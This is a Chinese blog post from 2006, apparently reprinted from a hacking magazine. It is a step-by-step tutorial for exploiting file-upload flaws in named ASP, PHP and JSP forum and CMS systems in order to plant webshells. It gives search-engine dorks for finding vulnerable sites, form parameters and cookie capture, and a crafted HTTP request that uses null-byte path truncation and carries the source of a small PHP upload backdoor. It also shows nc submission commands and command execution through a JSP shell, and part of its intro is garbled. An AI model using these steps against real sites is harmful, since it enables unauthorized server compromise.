数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 

万能上传击溃ASP/PHP/JSP脚本系统
樱木花盗 发表于 2006-9-5 17:25:23
自从动网7拉开上传漏洞序幕后,各种系统的上传漏洞接踵而来!它们的漏洞原理基本都差不多,利用方法上有略微的差异,简言之可以归纳为几步:先抓包,然后修改文件类型,再在上传路径后加上空格,用十六进制编辑器把空格改成00,最后用NC提交5比蛔詈没故钦乙桓鼍咛宓腢pFile文件来自己分析一下,这样有助于提高对漏洞的理解和记忆!
本文没有太高深的技术,只不过是把目前发现有上传漏洞的系统按编程语言分类汇总了一下,并通过桂林老兵的一个软件,结合实例讲解各种系统的漏洞利用方法。在具体实例中上传了各种流行的WebShell,以供大家参考!同时也希望借此能提醒部分程序员在编程时要注意思维的严密性,避免千里之堤而溃于蚁穴!下面我们先从老兵的这个工具开始!
 
先简单介绍一下老兵的这个程序,界面如下图1所示:
图1
为了方便说明,我们对照DvBBS的UpFile.asp和Reg_upload.asp两个文件来说明(不一定要全部看懂,大概意思知道就行了)。UpFile.asp文件为存在上传漏洞的文件,而Reg_upload.asp文件为我们在填上图工具时用到的参数,也就是说,UpFile.asp这个文件在执行时用到的参数都是来自Reg_upload.asp文件中表单所提交的内容!
UpFile是通过生成一个Form表(在Reg_upload.asp文件中)来实现上传的。代码如下:
<form name="form" method="post" action="UpFile.asp" ...>
<input type="hidden" name="filepath" value="uploadFace">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="Submit" value="上传" ...></form>

小知识:其中用到的变量如下:
FilePath:默认值是Uploadface,即上传后默认的存放目录,属性Hiden;
File1:这就是我们要传的文件;
结合上面的代码,我们来填写上传工具:
Action中输入存在上传漏洞文件的URL: http://target.net/bbs/UpFile.asp
UpPath里第一个文本框中的FilePath即为表单中的FilePath,也就是上传路径,等号后面填的是上传到对方服务器上的后门的名称/shell.asp;输入一个WEB程序允许上传的类型文本框中默认JPG就可以了(一般网站都允许上传JPG图片文件);File里第一个文本框中的File1即是表单中的File1,等号后面填写所要在本机上传的木马路径;Cookies中填上我们用抓取数据包工具如WsockExpert抓取的Cookies值,记住最好是你在系统中注册后的Cookies值。
 
刘流:用WsockExpert来抓Cookies有点小题大作,作者用的是一个叫Touchnet Browser的游览器,带有抓Cookies功能,使用起来非常方便,大家也可以考虑其它能抓Cookie的程序。
 
好了,“刀”我们已经磨锋利了,现在可以去砍柴了!实战开始,下面分别演示由ASP、PHP、JSP三种语言编写的脚本系统的上传漏洞!
 
ASP系统上传漏洞
1.【动网论坛
DvBBS 7.0 sp2以下所有版本(本测试使用DvBBS 7.0 sp1版本)。由于动网的上传漏洞是最常见,也是大家最熟悉的,这里就不多介绍了。分别在程序中各框体内填上实际的数据,提交后等待就OK了!如图2所示。
Action:填入http://www.***.com/bbs/upfile.asp
UpPath第一个文本框填入:filepath;第二个填入:/cmd.asp(你也可以写/bbs/cmd.asp这样上传成功后就传到/bbs 目录下了!)
输入一个WEB程序允许上传的类型文本框中默认JPG就可以了
File第一个文本框输入:file1;第二个填入:D:\Hacktools\muma\cmd.asp(这个是cmd.asp这个后门在自己机器上的路径)
Cookies:是我用Touchnet browse这个浏览器抓的!其主要功能是用来验证!没有它会报错的噢!填好了!我们就点击“Submit”按键提交吧!!
图2
提交后用浏览器看一下是否成功,成功上传!如图3所示。
图3
后门介绍:用的是一个很老的后门,文本框中输入DOS命令”netstat –an”点运行后,就会看到本机都开了哪些端口,及与远程主机的连接情况了^_^
小提示:文件已经上传成功,但没有出现“上传成功”的提示对话框,可以在浏览器里直接输入目标站点上的WebShell路径来测试是否成功,程序有时候会有误报。
 
2.【尘缘新闻系统】
尘缘新闻系统0.45 Finish以下版本(测试版本V1.0 ACCESS Finish)。先在Google里搜索关键词:V1.0 ACCESS Finish,会看到出现一大堆使用尘缘雅境系统的网站,而它们就是我们的目标了!
先来分析一下如何填写参数:比如说某网站首页是http://www.xx.com/asfq/index.asp,那么就要这样填写:
Action:http://www.xx.com/asfq/admin/uploadfaceok.asp
漏洞目录:/asfq/admin(注意一定要加上admin)
在Uploadface.asp中找相应的参数;Uploadface.asp中的如下表单:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="CopyrightInfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="类型:jpg,gif,png,bmp,限制:200K">
<input type="submit" name="Submit" value="上传" >
参数的填写方法类似动网的!
提交数据,成功后结果如图4、5所示。
 
图4
图5
后门介绍:用的是动鲨的一个网页木马,执行DOS之前,你还要把c:\winnt\system32\cmd.exe上传到与网页木马相同的目录下,否则命令是不会执行的!很多网站做了安全策略,利用上例的木马DOS命令不能执行,有时利用动鲨的这个asp木马就可以执行一些DOS命令了!
小提示:漏洞文件一般不用改,不过有些老版的尘缘系统的漏洞文件是Uploadok.asp,如果Uploadfaceok.asp不成功再改成Uploadok.asp。
 
3.【动感下载系统】
动感下载系统XP专业版 v1.3 Build 0112及以下版本。在百度里搜索:SoftView.Asp?SoftID=,找到N多套系统。在它的Upload.asp中存在如下表单:
<form name="form" method="post" action="UpFile.asp" enctype="multipart/form-data" >
<input type="hidden" name="filepath" value="../upload200409">
<input type="hidden" name="act" value="upload">文件位置:
<input type="file" name="file1" size="38">
<input type="submit" name="Submit" value="上传" onclick="parent.document.myform.Submit.disabled=true,parent.document.myform.Submit2.disabled=true;"> <br>文件类型:gif/jpg/zip/rar,大小限制:3000K</form>
有功底的朋友大概都看出来问题了吧?这里文章不是分析具体漏洞的,也就不做详细讲解了,新手朋友们就直接先按下面的参数提交成功后再来慢慢研究具体的漏洞吧!如图6、7所示。
图6
 
图7
后门介绍: _blank>冰狐浪子微型ASP后门,非常小的一个后门仅一句话,也可插在别的网页里面,它把常用功能集成到一起,写入存在的文件、环境探测、磁盘信息、搜索网络邻居共享
小提示:在百度里搜索:SoftView.Asp?SoftID=找到的版本是Access版的程序,如果搜索/SoftView/SoftView,找到的是SQL版的程序。
 
4.Dxxo论坛
Dxxo论坛2004年1月发布版。它的Uploadface.asp文件中存在如下表单:
<form method="post" action="upload.asp" enctype="multipart/form-data" name="form2" class=tdc >
<input type=file name="file1" size="40"  class=bdtj>
<input type="hidden" name=" uploadfacey" value="uploadface/">
<input type="submit" name="submit" value="上 传" class=bdtj></form>
这里和前面的漏洞有点不同,UpPath 第一个文本框中要改成Uploadfacey而不是上例中的FilePath,Cookies的值要注册后抓的值,不然无法成功!具体参数如下图8,9所示。
 
 
图8
图9
 
后门介绍:一个很不错的木马,可以让你在目标机器上写文件!在保存文件的绝对路径下的文本框中输入目标机器上木马的存放位置和文件名,绝对路径下面已经给出来了!我们可以参照着它写;在输入马的内容中复制上木马的内容!点保存就OK了!
小提示:这里不要管图8左边文本框出现的上传成功后显示的文件名(下划线部分):
<script>parent.form1.f3_content.value+='[uploadimg]fyzw_2004926201636.jpg[/uploadimg]'</script>test.jpg(1162)上传成功!没有看到test.asp,没关系只要直接在浏览中直接输入WebShell的地址访问就可以得到后门了(如图9所示): http://www.ri*an.cc/bbs/uploadface/test.asp
5.【天意商务网】
天意商务网3.6、3.7版。在百度中搜索“天意商务网”,会找到很多装有天意商务网的站点。它的Add.asp文件中存在如下表单:
<form method="POST" action="zs_save_add.asp" name="Form1" nctype="multipart/form-data">
<input type="hidden" name="filepath" value="../../picture/">
<INPUT type="file" class="f11" name="file" size="33"title=上传产品图片资料不能大于200K。(要求:250×250像素)>
这里也有一点不同,File的第一个文本框中要输入file,“zs_save_add.asp”的确切位置是:“manage/spzs/zs_save_add.asp”,而且成功后也没有出现“上传成功”的对话框!参数如下图10、11所示:
10图
图11
后门介绍:带有名字,密码,认证,可以把它伪装成一个后台管理界面,而且功能也很多。
小提示:天意商务网系统有一个变量ID过滤不严,利用NBSI2很容易注入!!
【乔客论坛
所用版本:Joekoe V6.0。这个是我在做实验过程中用时最多的一个,因为参数太多,开始实验时总是报参数错误。
首先来看如何找到我们用的表单:
在浏览中输入http://www.zr1*3.com/user_put.asp?action=gallery(别忘了登录噢!)然后查看源文件内容:
<tr><td>上传图片:</td><td><iframe frameborder=0 name=upload_frame width='100%' height=30 scrolling=no src='upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic'></iframe></td></tr>
表单存放在upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic中了!
其次在表单中找参数:
在浏览器中输入:http://www.zr1*3.com/upload.asp?action=gallery&upname=g2004927110356&uptext=pic'查看其源文件内容:
<form name=form1 action='?action=UpFile' method=post enctype='multipart/form-data'>
<input type=hidden name=up_path value='gallery'>
<input type=hidden name=up_name value='g2004927110356'>
<input type=hidden name=up_text value='pic'><tr>
<td><input type=file name=file_name1 value='' size=40></td>
<td align=center height=30><input type=submit name=submit value='点击上传'>
注意:在Action中输入http://www.zr1*3.com/upload.asp?action=UpFile;UpPath第一个文本框中输入:up_name,第二个中输入上传后的SHELL名称test.asp;File 第一个文本框中输入file_name1;参数如下图12、13所示:
                                          图12
图13
后门介绍:用的是血汉个人美化版!此木马功能非常多,可算是木马中的精典!第一:就算你得到了源代码也看不到明文的密码!第二:具有浏览,上传,下载,复制,删除,执行DOS命令,执行SQL命令,查看系统配置及nfso功能!
小提示:http://www.zr1*3.com/upload.asp?action=UpFile,以参数action=UpFile一定不能丢啊!!如图13所示,后门所在路径为:upload/other/test.asp
㈡:PHP上传漏洞
测试程序:NEATPIC PHP目录直读版 1.2.3(开入了上传图片功能)
当PHP程序有指定PATH时,在PATH文件后门加入%00可以上传任意文件.
在百度里搜索“NEATPIC PHP目录直读版 1.2.3”你会找到很多装有此程序的站点!
第一步:用WsockExpert抓包
POST /index.php?action=upload HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
Referer: http://mycol.51*j.com/index.php?path=.
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d425237102f4
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: mycol.51*j.com
Content-Length: 982             //修改后为994,“/test.php%00”为12个字符
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=58894c5616b85eb6a93dcef949233176
-----------------------------7d425237102f4
Content-Disposition: form-data; name="path"
.      //修改后为“./test.php%00”
-----------------------------7d425237102f4
Content-Disposition: form-data; name="image"; filename="D:\Hacktools\muma\upload.php"   
//修改后为:"D:\Hacktools\muma\upload.gif"
Content-Type: text/plain
<?php
$action4="";
$remotefile="";
$localfile="";
if(isset($HTTP_POST_VARS['action4']))
{        $action4 = $HTTP_POST_VARS['action4'];
}if(isset($HTTP_POST_FILES['UpFile1']))
{        $remotefile = $HTTP_POST_FILES['UpFile1']['tmp_name'];
        $localfile = $HTTP_POST_FILES['UpFile1']['name'];}
if($action4)
{        copy($remotefile,$localfile);
        unlink($remotefile);
        echo "upload file successfull";}
{?>
<form method="post" action="" enctype="multipart/form-data">
<input type=file name="UpFile1" value="" size=40><br>
<input type=hidden name="action4" value="upload"><br>
<input type=submit name="submit" value="Upload">
</form><?}?>  
-----------------------------7d425237102f4--
第二步:修改
在“。”后面加上“/test.php%00”,为12字符,所以982要改成994,把cmd.php改成cmd.gif保存文件为test.txt后退出!
第三步:NC提交
nc –v  www.mycol.5**j.com 80 <test.txt执行结果如图14

图14
在浏览器中输入:http://mycol.51*j.com/test.php我们的上传功能的SHELL出来了^_^如图15

                                     
                   图15
                                                                                  
后门介绍:因为用NC上传时为保证成功率,所以自己编了一个仅能实现上传功能的短小木马;利用它你可以把安全天使angle写的一个经典PHP木马――phpspy上传上去!
㈢:JSP上传漏洞篇:
一天无意中进了一个论坛,还是JSP编的来!注册一个用户后,在发表新文章里和修改个人资料里面均没有上传功能,然而在回复贴子时,有上传附件功能!于是在网上找了个JSP的SHELL(JSP网页木马3.0)上传后出现如图16错误:

图16
如果把“Content-Type: text/plain”改成“Content-Type: image/jpeg”能不能上传呢?用WsockExpert抓包,把数据存到记事本了,然后把“text/plain”改成“image/jpeg”存盘退出,用Nc提交:nc –v www.***.com 80 <jsp_UpFile.txt结果如图17:


                 图17
在浏览器里输入:_1096291342664.jsp?cmd=id">http://www.***.com/bbs/upload/image/4368_1096291342664.jsp?cmd=id如图18所示:


                 图18
哇噻!!还是ROOT权限来,让俺想起了范伟说的一句说:“大哥,甭说了,啥也不用说了”该怎么办自己看着为吧!
后门介绍:用的是JSP网页木马3.0;带一个参数CMD,如上图所示在“=”号后面加上要执行的命令就OK了!
目前,存在以上漏洞的系统还很多,利用此文章造成什么后果,与作者和黑防无关,特此声明!

阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.